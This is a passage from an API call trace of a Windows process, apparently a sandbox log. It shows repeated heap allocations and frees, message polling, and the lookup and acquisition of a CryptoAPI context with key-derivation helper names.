(in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0243.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0243.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0243.759] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.759] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.759] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0243.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0243.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.761] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0243.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0243.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0243.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0243.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0243.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0243.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0243.762] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0243.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0243.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69928 [0243.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0243.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0243.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0243.763] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0243.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0243.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0243.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0243.764] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0243.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0243.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0243.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0243.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0243.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.807] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0243.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0243.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0243.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0243.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0243.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0243.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0243.809] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.809] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0243.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0243.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0243.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0243.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.810] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0243.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0243.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0243.810] 